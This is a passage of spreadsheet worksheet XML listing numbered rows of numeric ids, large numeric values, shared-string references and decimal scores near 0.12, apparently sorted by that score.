      <c r="D17417" s="2">
        <v>1.0</v>
      </c>
      <c r="E17417" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17417" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="17418" ht="15.75" customHeight="1">
      <c r="A17418" s="1">
        <v>25364.0</v>
      </c>
      <c r="B17418" s="2">
        <v>1.3592787E7</v>
      </c>
      <c r="C17418" s="2" t="s">
        <v>16792</v>
      </c>
      <c r="D17418" s="2">
        <v>1.0</v>
      </c>
      <c r="E17418" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17418" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="17419" ht="15.75" customHeight="1">
      <c r="A17419" s="1">
        <v>26307.0</v>
      </c>
      <c r="B17419" s="2">
        <v>1.6616393E7</v>
      </c>
      <c r="C17419" s="2" t="s">
        <v>16793</v>
      </c>
      <c r="D17419" s="2">
        <v>1.0</v>
      </c>
      <c r="E17419" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17419" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="17420" ht="15.75" customHeight="1">
      <c r="A17420" s="1">
        <v>26379.0</v>
      </c>
      <c r="B17420" s="2">
        <v>1.6978644E7</v>
      </c>
      <c r="C17420" s="2" t="s">
        <v>16783</v>
      </c>
      <c r="D17420" s="2">
        <v>1.0</v>
      </c>
      <c r="E17420" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17420" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="17421" ht="15.75" customHeight="1">
      <c r="A17421" s="1">
        <v>26694.0</v>
      </c>
      <c r="B17421" s="2">
        <v>1.8132693E7</v>
      </c>
      <c r="C17421" s="2" t="s">
        <v>16794</v>
      </c>
      <c r="D17421" s="2">
        <v>1.0</v>
      </c>
      <c r="E17421" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17421" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="17422" ht="15.75" customHeight="1">
      <c r="A17422" s="1">
        <v>27484.0</v>
      </c>
      <c r="B17422" s="2">
        <v>2.2039069E7</v>
      </c>
      <c r="C17422" s="2" t="s">
        <v>16795</v>
      </c>
      <c r="D17422" s="2">
        <v>1.0</v>
      </c>
      <c r="E17422" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17422" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="17423" ht="15.75" customHeight="1">
      <c r="A17423" s="1">
        <v>28194.0</v>
      </c>
      <c r="B17423" s="2">
        <v>2.5013368E7</v>
      </c>
      <c r="C17423" s="2" t="s">
        <v>16796</v>
      </c>
      <c r="D17423" s="2">
        <v>1.0</v>
      </c>
      <c r="E17423" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17423" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="17424" ht="15.75" customHeight="1">
      <c r="A17424" s="1">
        <v>28479.0</v>
      </c>
      <c r="B17424" s="2">
        <v>2.6636948E7</v>
      </c>
      <c r="C17424" s="2" t="s">
        <v>16797</v>
      </c>
      <c r="D17424" s="2">
        <v>1.0</v>
      </c>
      <c r="E17424" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17424" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="17425" ht="15.75" customHeight="1">
      <c r="A17425" s="1">
        <v>28483.0</v>
      </c>
      <c r="B17425" s="2">
        <v>2.6636948E7</v>
      </c>
      <c r="C17425" s="2" t="s">
        <v>16798</v>
      </c>
      <c r="D17425" s="2">
        <v>1.0</v>
      </c>
      <c r="E17425" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17425" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="17426" ht="15.75" customHeight="1">
      <c r="A17426" s="1">
        <v>30025.0</v>
      </c>
      <c r="B17426" s="2">
        <v>3.6178198E7</v>
      </c>
      <c r="C17426" s="2" t="s">
        <v>16799</v>
      </c>
      <c r="D17426" s="2">
        <v>1.0</v>
      </c>
      <c r="E17426" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17426" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="17427" ht="15.75" customHeight="1">
      <c r="A17427" s="1">
        <v>30981.0</v>
      </c>
      <c r="B17427" s="2">
        <v>4.7524183E7</v>
      </c>
      <c r="C17427" s="2" t="s">
        <v>16800</v>
      </c>
      <c r="D17427" s="2">
        <v>1.0</v>
      </c>
      <c r="E17427" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17427" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="17428" ht="15.75" customHeight="1">
      <c r="A17428" s="1">
        <v>31248.0</v>
      </c>
      <c r="B17428" s="2">
        <v>4933607.0</v>
      </c>
      <c r="C17428" s="2" t="s">
        <v>16801</v>
      </c>
      <c r="D17428" s="2">
        <v>1.0</v>
      </c>
      <c r="E17428" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17428" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="17429" ht="15.75" customHeight="1">
      <c r="A17429" s="1">
        <v>31602.0</v>
      </c>
      <c r="B17429" s="2">
        <v>5134320.0</v>
      </c>
      <c r="C17429" s="2" t="s">
        <v>16802</v>
      </c>
      <c r="D17429" s="2">
        <v>1.0</v>
      </c>
      <c r="E17429" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17429" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="17430" ht="15.75" customHeight="1">
      <c r="A17430" s="1">
        <v>32783.0</v>
      </c>
      <c r="B17430" s="2">
        <v>6132882.0</v>
      </c>
      <c r="C17430" s="2" t="s">
        <v>16803</v>
      </c>
      <c r="D17430" s="2">
        <v>1.0</v>
      </c>
      <c r="E17430" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17430" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="17431" ht="15.75" customHeight="1">
      <c r="A17431" s="1">
        <v>33280.0</v>
      </c>
      <c r="B17431" s="2">
        <v>7430209.0</v>
      </c>
      <c r="C17431" s="2" t="s">
        <v>16804</v>
      </c>
      <c r="D17431" s="2">
        <v>1.0</v>
      </c>
      <c r="E17431" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17431" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="17432" ht="15.75" customHeight="1">
      <c r="A17432" s="1">
        <v>34172.0</v>
      </c>
      <c r="B17432" s="2">
        <v>9926840.0</v>
      </c>
      <c r="C17432" s="2" t="s">
        <v>16805</v>
      </c>
      <c r="D17432" s="2">
        <v>1.0</v>
      </c>
      <c r="E17432" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17432" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="17433" ht="15.75" customHeight="1">
      <c r="A17433" s="1">
        <v>5865.0</v>
      </c>
      <c r="B17433" s="2">
        <v>4.7001618E7</v>
      </c>
      <c r="C17433" s="2" t="s">
        <v>16806</v>
      </c>
      <c r="D17433" s="2">
        <v>1.0</v>
      </c>
      <c r="E17433" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17433" s="2">
        <v>0.1233521657250471</v>
      </c>
    </row>
    <row r="17434" ht="15.75" customHeight="1">
      <c r="A17434" s="1">
        <v>23749.0</v>
      </c>
      <c r="B17434" s="2">
        <v>7430210.0</v>
      </c>
      <c r="C17434" s="2" t="s">
        <v>16807</v>
      </c>
      <c r="D17434" s="2">
        <v>1.0</v>
      </c>
      <c r="E17434" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17434" s="2">
        <v>0.1231481481481481</v>
      </c>
    </row>
    <row r="17435" ht="15.75" customHeight="1">
      <c r="A17435" s="1">
        <v>23893.0</v>
      </c>
      <c r="B17435" s="2">
        <v>8425335.0</v>
      </c>
      <c r="C17435" s="2" t="s">
        <v>16808</v>
      </c>
      <c r="D17435" s="2">
        <v>1.0</v>
      </c>
      <c r="E17435" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17435" s="2">
        <v>0.1231481481481481</v>
      </c>
    </row>
    <row r="17436" ht="15.75" customHeight="1">
      <c r="A17436" s="1">
        <v>25965.0</v>
      </c>
      <c r="B17436" s="2">
        <v>1.526871E7</v>
      </c>
      <c r="C17436" s="2" t="s">
        <v>16809</v>
      </c>
      <c r="D17436" s="2">
        <v>1.0</v>
      </c>
      <c r="E17436" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17436" s="2">
        <v>0.1229508196721312</v>
      </c>
    </row>
    <row r="17437" ht="15.75" customHeight="1">
      <c r="A17437" s="1">
        <v>33176.0</v>
      </c>
      <c r="B17437" s="2">
        <v>7086250.0</v>
      </c>
      <c r="C17437" s="2" t="s">
        <v>16810</v>
      </c>
      <c r="D17437" s="2">
        <v>1.0</v>
      </c>
      <c r="E17437" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17437" s="2">
        <v>0.1229508196721312</v>
      </c>
    </row>
    <row r="17438" ht="15.75" customHeight="1">
      <c r="A17438" s="1">
        <v>16274.0</v>
      </c>
      <c r="B17438" s="2">
        <v>4.5792575E7</v>
      </c>
      <c r="C17438" s="2" t="s">
        <v>16811</v>
      </c>
      <c r="D17438" s="2">
        <v>1.0</v>
      </c>
      <c r="E17438" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17438" s="2">
        <v>0.1229508196721311</v>
      </c>
    </row>
    <row r="17439" ht="15.75" customHeight="1">
      <c r="A17439" s="1">
        <v>22796.0</v>
      </c>
      <c r="B17439" s="2">
        <v>4.5551979E7</v>
      </c>
      <c r="C17439" s="2" t="s">
        <v>16812</v>
      </c>
      <c r="D17439" s="2">
        <v>1.0</v>
      </c>
      <c r="E17439" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17439" s="2">
        <v>0.1229508196721311</v>
      </c>
    </row>
    <row r="17440" ht="15.75" customHeight="1">
      <c r="A17440" s="1">
        <v>25837.0</v>
      </c>
      <c r="B17440" s="2">
        <v>1.4785465E7</v>
      </c>
      <c r="C17440" s="2" t="s">
        <v>16813</v>
      </c>
      <c r="D17440" s="2">
        <v>1.0</v>
      </c>
      <c r="E17440" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17440" s="2">
        <v>0.1228482003129891</v>
      </c>
    </row>
    <row r="17441" ht="15.75" customHeight="1">
      <c r="A17441" s="1">
        <v>16452.0</v>
      </c>
      <c r="B17441" s="2">
        <v>4.6419481E7</v>
      </c>
      <c r="C17441" s="2" t="s">
        <v>16814</v>
      </c>
      <c r="D17441" s="2">
        <v>1.0</v>
      </c>
      <c r="E17441" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17441" s="2">
        <v>0.1227598566308244</v>
      </c>
    </row>
    <row r="17442" ht="15.75" customHeight="1">
      <c r="A17442" s="1">
        <v>32616.0</v>
      </c>
      <c r="B17442" s="2">
        <v>5836852.0</v>
      </c>
      <c r="C17442" s="2" t="s">
        <v>16815</v>
      </c>
      <c r="D17442" s="2">
        <v>1.0</v>
      </c>
      <c r="E17442" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17442" s="2">
        <v>0.1227598566308244</v>
      </c>
    </row>
    <row r="17443" ht="15.75" customHeight="1">
      <c r="A17443" s="1">
        <v>610.0</v>
      </c>
      <c r="B17443" s="2">
        <v>1.9416079E7</v>
      </c>
      <c r="C17443" s="2" t="s">
        <v>16816</v>
      </c>
      <c r="D17443" s="2">
        <v>1.0</v>
      </c>
      <c r="E17443" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17443" s="2">
        <v>0.1226851851851852</v>
      </c>
    </row>
    <row r="17444" ht="15.75" customHeight="1">
      <c r="A17444" s="1">
        <v>18232.0</v>
      </c>
      <c r="B17444" s="2">
        <v>5.2108671E7</v>
      </c>
      <c r="C17444" s="2" t="s">
        <v>16817</v>
      </c>
      <c r="D17444" s="2">
        <v>1.0</v>
      </c>
      <c r="E17444" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17444" s="2">
        <v>0.1225749559082893</v>
      </c>
    </row>
    <row r="17445" ht="15.75" customHeight="1">
      <c r="A17445" s="1">
        <v>33679.0</v>
      </c>
      <c r="B17445" s="2">
        <v>8425334.0</v>
      </c>
      <c r="C17445" s="2" t="s">
        <v>16818</v>
      </c>
      <c r="D17445" s="2">
        <v>1.0</v>
      </c>
      <c r="E17445" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17445" s="2">
        <v>0.1225749559082893</v>
      </c>
    </row>
    <row r="17446" ht="15.75" customHeight="1">
      <c r="A17446" s="1">
        <v>721.0</v>
      </c>
      <c r="B17446" s="2">
        <v>2.0688693E7</v>
      </c>
      <c r="C17446" s="2" t="s">
        <v>16819</v>
      </c>
      <c r="D17446" s="2">
        <v>1.0</v>
      </c>
      <c r="E17446" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17446" s="2">
        <v>0.1224279835390946</v>
      </c>
    </row>
    <row r="17447" ht="15.75" customHeight="1">
      <c r="A17447" s="1">
        <v>14571.0</v>
      </c>
      <c r="B17447" s="2">
        <v>4.0064754E7</v>
      </c>
      <c r="C17447" s="2" t="s">
        <v>16820</v>
      </c>
      <c r="D17447" s="2">
        <v>1.0</v>
      </c>
      <c r="E17447" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17447" s="2">
        <v>0.1224279835390946</v>
      </c>
    </row>
    <row r="17448" ht="15.75" customHeight="1">
      <c r="A17448" s="1">
        <v>2644.0</v>
      </c>
      <c r="B17448" s="2">
        <v>3.465576E7</v>
      </c>
      <c r="C17448" s="2" t="s">
        <v>16821</v>
      </c>
      <c r="D17448" s="2">
        <v>1.0</v>
      </c>
      <c r="E17448" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17448" s="2">
        <v>0.1223958333333333</v>
      </c>
    </row>
    <row r="17449" ht="15.75" customHeight="1">
      <c r="A17449" s="1">
        <v>14902.0</v>
      </c>
      <c r="B17449" s="2">
        <v>4.1158204E7</v>
      </c>
      <c r="C17449" s="2" t="s">
        <v>16822</v>
      </c>
      <c r="D17449" s="2">
        <v>1.0</v>
      </c>
      <c r="E17449" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17449" s="2">
        <v>0.1222222222222222</v>
      </c>
    </row>
    <row r="17450" ht="15.75" customHeight="1">
      <c r="A17450" s="1">
        <v>28345.0</v>
      </c>
      <c r="B17450" s="2">
        <v>2.5923903E7</v>
      </c>
      <c r="C17450" s="2" t="s">
        <v>16823</v>
      </c>
      <c r="D17450" s="2">
        <v>1.0</v>
      </c>
      <c r="E17450" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17450" s="2">
        <v>0.1222222222222222</v>
      </c>
    </row>
    <row r="17451" ht="15.75" customHeight="1">
      <c r="A17451" s="1">
        <v>16909.0</v>
      </c>
      <c r="B17451" s="2">
        <v>4.8120706E7</v>
      </c>
      <c r="C17451" s="2" t="s">
        <v>16824</v>
      </c>
      <c r="D17451" s="2">
        <v>1.0</v>
      </c>
      <c r="E17451" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17451" s="2">
        <v>0.1220538720538721</v>
      </c>
    </row>
    <row r="17452" ht="15.75" customHeight="1">
      <c r="A17452" s="1">
        <v>10402.0</v>
      </c>
      <c r="B17452" s="2">
        <v>9615635.0</v>
      </c>
      <c r="C17452" s="2" t="s">
        <v>16825</v>
      </c>
      <c r="D17452" s="2">
        <v>1.0</v>
      </c>
      <c r="E17452" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17452" s="2">
        <v>0.1220238095238095</v>
      </c>
    </row>
    <row r="17453" ht="15.75" customHeight="1">
      <c r="A17453" s="1">
        <v>11214.0</v>
      </c>
      <c r="B17453" s="2">
        <v>2.0189178E7</v>
      </c>
      <c r="C17453" s="2" t="s">
        <v>16826</v>
      </c>
      <c r="D17453" s="2">
        <v>1.0</v>
      </c>
      <c r="E17453" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17453" s="2">
        <v>0.1220238095238095</v>
      </c>
    </row>
    <row r="17454" ht="15.75" customHeight="1">
      <c r="A17454" s="1">
        <v>26805.0</v>
      </c>
      <c r="B17454" s="2">
        <v>1.8672579E7</v>
      </c>
      <c r="C17454" s="2" t="s">
        <v>16827</v>
      </c>
      <c r="D17454" s="2">
        <v>1.0</v>
      </c>
      <c r="E17454" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17454" s="2">
        <v>0.1220238095238095</v>
      </c>
    </row>
    <row r="17455" ht="15.75" customHeight="1">
      <c r="A17455" s="1">
        <v>31760.0</v>
      </c>
      <c r="B17455" s="2">
        <v>5.2155161E7</v>
      </c>
      <c r="C17455" s="2" t="s">
        <v>16828</v>
      </c>
      <c r="D17455" s="2">
        <v>1.0</v>
      </c>
      <c r="E17455" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17455" s="2">
        <v>0.1220238095238095</v>
      </c>
    </row>
    <row r="17456" ht="15.75" customHeight="1">
      <c r="A17456" s="1">
        <v>24854.0</v>
      </c>
      <c r="B17456" s="2">
        <v>1.2200204E7</v>
      </c>
      <c r="C17456" s="2" t="s">
        <v>16829</v>
      </c>
      <c r="D17456" s="2">
        <v>1.0</v>
      </c>
      <c r="E17456" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17456" s="2">
        <v>0.1218905472636816</v>
      </c>
    </row>
    <row r="17457" ht="15.75" customHeight="1">
      <c r="A17457" s="1">
        <v>28144.0</v>
      </c>
      <c r="B17457" s="2">
        <v>2.4803875E7</v>
      </c>
      <c r="C17457" s="2" t="s">
        <v>16830</v>
      </c>
      <c r="D17457" s="2">
        <v>1.0</v>
      </c>
      <c r="E17457" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17457" s="2">
        <v>0.1218905472636816</v>
      </c>
    </row>
    <row r="17458" ht="15.75" customHeight="1">
      <c r="A17458" s="1">
        <v>7105.0</v>
      </c>
      <c r="B17458" s="2">
        <v>5.0350519E7</v>
      </c>
      <c r="C17458" s="2" t="s">
        <v>16831</v>
      </c>
      <c r="D17458" s="2">
        <v>1.0</v>
      </c>
      <c r="E17458" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17458" s="2">
        <v>0.121832358674464</v>
      </c>
    </row>
    <row r="17459" ht="15.75" customHeight="1">
      <c r="A17459" s="1">
        <v>9913.0</v>
      </c>
      <c r="B17459" s="2">
        <v>5.6797336E7</v>
      </c>
      <c r="C17459" s="2" t="s">
        <v>16832</v>
      </c>
      <c r="D17459" s="2">
        <v>1.0</v>
      </c>
      <c r="E17459" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17459" s="2">
        <v>0.121832358674464</v>
      </c>
    </row>
    <row r="17460" ht="15.75" customHeight="1">
      <c r="A17460" s="1">
        <v>12107.0</v>
      </c>
      <c r="B17460" s="2">
        <v>2.6825561E7</v>
      </c>
      <c r="C17460" s="2" t="s">
        <v>16833</v>
      </c>
      <c r="D17460" s="2">
        <v>1.0</v>
      </c>
      <c r="E17460" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17460" s="2">
        <v>0.121832358674464</v>
      </c>
    </row>
    <row r="17461" ht="15.75" customHeight="1">
      <c r="A17461" s="1">
        <v>21469.0</v>
      </c>
      <c r="B17461" s="2">
        <v>2.283268E7</v>
      </c>
      <c r="C17461" s="2" t="s">
        <v>16834</v>
      </c>
      <c r="D17461" s="2">
        <v>1.0</v>
      </c>
      <c r="E17461" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17461" s="2">
        <v>0.121832358674464</v>
      </c>
    </row>
    <row r="17462" ht="15.75" customHeight="1">
      <c r="A17462" s="1">
        <v>26532.0</v>
      </c>
      <c r="B17462" s="2">
        <v>1.7706095E7</v>
      </c>
      <c r="C17462" s="2" t="s">
        <v>16835</v>
      </c>
      <c r="D17462" s="2">
        <v>1.0</v>
      </c>
      <c r="E17462" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17462" s="2">
        <v>0.121832358674464</v>
      </c>
    </row>
    <row r="17463" ht="15.75" customHeight="1">
      <c r="A17463" s="1">
        <v>30383.0</v>
      </c>
      <c r="B17463" s="2">
        <v>3.8537922E7</v>
      </c>
      <c r="C17463" s="2" t="s">
        <v>16836</v>
      </c>
      <c r="D17463" s="2">
        <v>1.0</v>
      </c>
      <c r="E17463" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17463" s="2">
        <v>0.121832358674464</v>
      </c>
    </row>
    <row r="17464" ht="15.75" customHeight="1">
      <c r="A17464" s="1">
        <v>983.0</v>
      </c>
      <c r="B17464" s="2">
        <v>2.2857939E7</v>
      </c>
      <c r="C17464" s="2" t="s">
        <v>16837</v>
      </c>
      <c r="D17464" s="2">
        <v>1.0</v>
      </c>
      <c r="E17464" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17464" s="2">
        <v>0.1218323586744639</v>
      </c>
    </row>
    <row r="17465" ht="15.75" customHeight="1">
      <c r="A17465" s="1">
        <v>12094.0</v>
      </c>
      <c r="B17465" s="2">
        <v>2.6723308E7</v>
      </c>
      <c r="C17465" s="2" t="s">
        <v>16838</v>
      </c>
      <c r="D17465" s="2">
        <v>1.0</v>
      </c>
      <c r="E17465" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17465" s="2">
        <v>0.1218323586744639</v>
      </c>
    </row>
    <row r="17466" ht="15.75" customHeight="1">
      <c r="A17466" s="1">
        <v>18669.0</v>
      </c>
      <c r="B17466" s="2">
        <v>5.3541714E7</v>
      </c>
      <c r="C17466" s="2" t="s">
        <v>16839</v>
      </c>
      <c r="D17466" s="2">
        <v>1.0</v>
      </c>
      <c r="E17466" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17466" s="2">
        <v>0.1218323586744639</v>
      </c>
    </row>
    <row r="17467" ht="15.75" customHeight="1">
      <c r="A17467" s="1">
        <v>19469.0</v>
      </c>
      <c r="B17467" s="2">
        <v>5.5819724E7</v>
      </c>
      <c r="C17467" s="2" t="s">
        <v>16840</v>
      </c>
      <c r="D17467" s="2">
        <v>1.0</v>
      </c>
      <c r="E17467" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17467" s="2">
        <v>0.1218323586744639</v>
      </c>
    </row>
    <row r="17468" ht="15.75" customHeight="1">
      <c r="A17468" s="1">
        <v>20030.0</v>
      </c>
      <c r="B17468" s="2">
        <v>7002339.0</v>
      </c>
      <c r="C17468" s="2" t="s">
        <v>16841</v>
      </c>
      <c r="D17468" s="2">
        <v>1.0</v>
      </c>
      <c r="E17468" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17468" s="2">
        <v>0.1218323586744639</v>
      </c>
    </row>
    <row r="17469" ht="15.75" customHeight="1">
      <c r="A17469" s="1">
        <v>20570.0</v>
      </c>
      <c r="B17469" s="2">
        <v>1.3554711E7</v>
      </c>
      <c r="C17469" s="2" t="s">
        <v>16842</v>
      </c>
      <c r="D17469" s="2">
        <v>1.0</v>
      </c>
      <c r="E17469" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17469" s="2">
        <v>0.1218323586744639</v>
      </c>
    </row>
    <row r="17470" ht="15.75" customHeight="1">
      <c r="A17470" s="1">
        <v>30327.0</v>
      </c>
      <c r="B17470" s="2">
        <v>3.809513E7</v>
      </c>
      <c r="C17470" s="2" t="s">
        <v>16843</v>
      </c>
      <c r="D17470" s="2">
        <v>1.0</v>
      </c>
      <c r="E17470" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17470" s="2">
        <v>0.1218323586744639</v>
      </c>
    </row>
    <row r="17471" ht="15.75" customHeight="1">
      <c r="A17471" s="1">
        <v>15973.0</v>
      </c>
      <c r="B17471" s="2">
        <v>4.4848824E7</v>
      </c>
      <c r="C17471" s="2" t="s">
        <v>16844</v>
      </c>
      <c r="D17471" s="2">
        <v>1.0</v>
      </c>
      <c r="E17471" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17471" s="2">
        <v>0.1217320261437909</v>
      </c>
    </row>
    <row r="17472" ht="15.75" customHeight="1">
      <c r="A17472" s="1">
        <v>9634.0</v>
      </c>
      <c r="B17472" s="2">
        <v>5.6233868E7</v>
      </c>
      <c r="C17472" s="2" t="s">
        <v>16845</v>
      </c>
      <c r="D17472" s="2">
        <v>1.0</v>
      </c>
      <c r="E17472" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17472" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="17473" ht="15.75" customHeight="1">
      <c r="A17473" s="1">
        <v>19198.0</v>
      </c>
      <c r="B17473" s="2">
        <v>5.4985437E7</v>
      </c>
      <c r="C17473" s="2" t="s">
        <v>16846</v>
      </c>
      <c r="D17473" s="2">
        <v>1.0</v>
      </c>
      <c r="E17473" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17473" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="17474" ht="15.75" customHeight="1">
      <c r="A17474" s="1">
        <v>25090.0</v>
      </c>
      <c r="B17474" s="2">
        <v>1.2890218E7</v>
      </c>
      <c r="C17474" s="2" t="s">
        <v>16847</v>
      </c>
      <c r="D17474" s="2">
        <v>1.0</v>
      </c>
      <c r="E17474" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17474" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="17475" ht="15.75" customHeight="1">
      <c r="A17475" s="1">
        <v>34042.0</v>
      </c>
      <c r="B17475" s="2">
        <v>9576998.0</v>
      </c>
      <c r="C17475" s="2" t="s">
        <v>16848</v>
      </c>
      <c r="D17475" s="2">
        <v>1.0</v>
      </c>
      <c r="E17475" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17475" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="17476" ht="15.75" customHeight="1">
      <c r="A17476" s="1">
        <v>12463.0</v>
      </c>
      <c r="B17476" s="2">
        <v>2.938579E7</v>
      </c>
      <c r="C17476" s="2" t="s">
        <v>16849</v>
      </c>
      <c r="D17476" s="2">
        <v>1.0</v>
      </c>
      <c r="E17476" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17476" s="2">
        <v>0.121647509578544</v>
      </c>
    </row>
    <row r="17477" ht="15.75" customHeight="1">
      <c r="A17477" s="1">
        <v>12968.0</v>
      </c>
      <c r="B17477" s="2">
        <v>3.2528498E7</v>
      </c>
      <c r="C17477" s="2" t="s">
        <v>16850</v>
      </c>
      <c r="D17477" s="2">
        <v>1.0</v>
      </c>
      <c r="E17477" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17477" s="2">
        <v>0.121647509578544</v>
      </c>
    </row>
    <row r="17478" ht="15.75" customHeight="1">
      <c r="A17478" s="1">
        <v>27629.0</v>
      </c>
      <c r="B17478" s="2">
        <v>2.270865E7</v>
      </c>
      <c r="C17478" s="2" t="s">
        <v>16851</v>
      </c>
      <c r="D17478" s="2">
        <v>1.0</v>
      </c>
      <c r="E17478" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17478" s="2">
        <v>0.121647509578544</v>
      </c>
    </row>
    <row r="17479" ht="15.75" customHeight="1">
      <c r="A17479" s="1">
        <v>27896.0</v>
      </c>
      <c r="B17479" s="2">
        <v>2.3666187E7</v>
      </c>
      <c r="C17479" s="2" t="s">
        <v>16852</v>
      </c>
      <c r="D17479" s="2">
        <v>1.0</v>
      </c>
      <c r="E17479" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17479" s="2">
        <v>0.121647509578544</v>
      </c>
    </row>
    <row r="17480" ht="15.75" customHeight="1">
      <c r="A17480" s="1">
        <v>28572.0</v>
      </c>
      <c r="B17480" s="2">
        <v>2.6933153E7</v>
      </c>
      <c r="C17480" s="2" t="s">
        <v>16853</v>
      </c>
      <c r="D17480" s="2">
        <v>1.0</v>
      </c>
      <c r="E17480" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17480" s="2">
        <v>0.121647509578544</v>
      </c>
    </row>
    <row r="17481" ht="15.75" customHeight="1">
      <c r="A17481" s="1">
        <v>29048.0</v>
      </c>
      <c r="B17481" s="2">
        <v>3.0205177E7</v>
      </c>
      <c r="C17481" s="2" t="s">
        <v>16854</v>
      </c>
      <c r="D17481" s="2">
        <v>1.0</v>
      </c>
      <c r="E17481" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17481" s="2">
        <v>0.121647509578544</v>
      </c>
    </row>
    <row r="17482" ht="15.75" customHeight="1">
      <c r="A17482" s="1">
        <v>32283.0</v>
      </c>
      <c r="B17482" s="2">
        <v>5.5361321E7</v>
      </c>
      <c r="C17482" s="2" t="s">
        <v>16855</v>
      </c>
      <c r="D17482" s="2">
        <v>1.0</v>
      </c>
      <c r="E17482" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17482" s="2">
        <v>0.121647509578544</v>
      </c>
    </row>
    <row r="17483" ht="15.75" customHeight="1">
      <c r="A17483" s="1">
        <v>19297.0</v>
      </c>
      <c r="B17483" s="2">
        <v>5.5200933E7</v>
      </c>
      <c r="C17483" s="2" t="s">
        <v>16856</v>
      </c>
      <c r="D17483" s="2">
        <v>1.0</v>
      </c>
      <c r="E17483" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17483" s="2">
        <v>0.1215780998389694</v>
      </c>
    </row>
    <row r="17484" ht="15.75" customHeight="1">
      <c r="A17484" s="1">
        <v>3976.0</v>
      </c>
      <c r="B17484" s="2">
        <v>4.0826675E7</v>
      </c>
      <c r="C17484" s="2" t="s">
        <v>16857</v>
      </c>
      <c r="D17484" s="2">
        <v>1.0</v>
      </c>
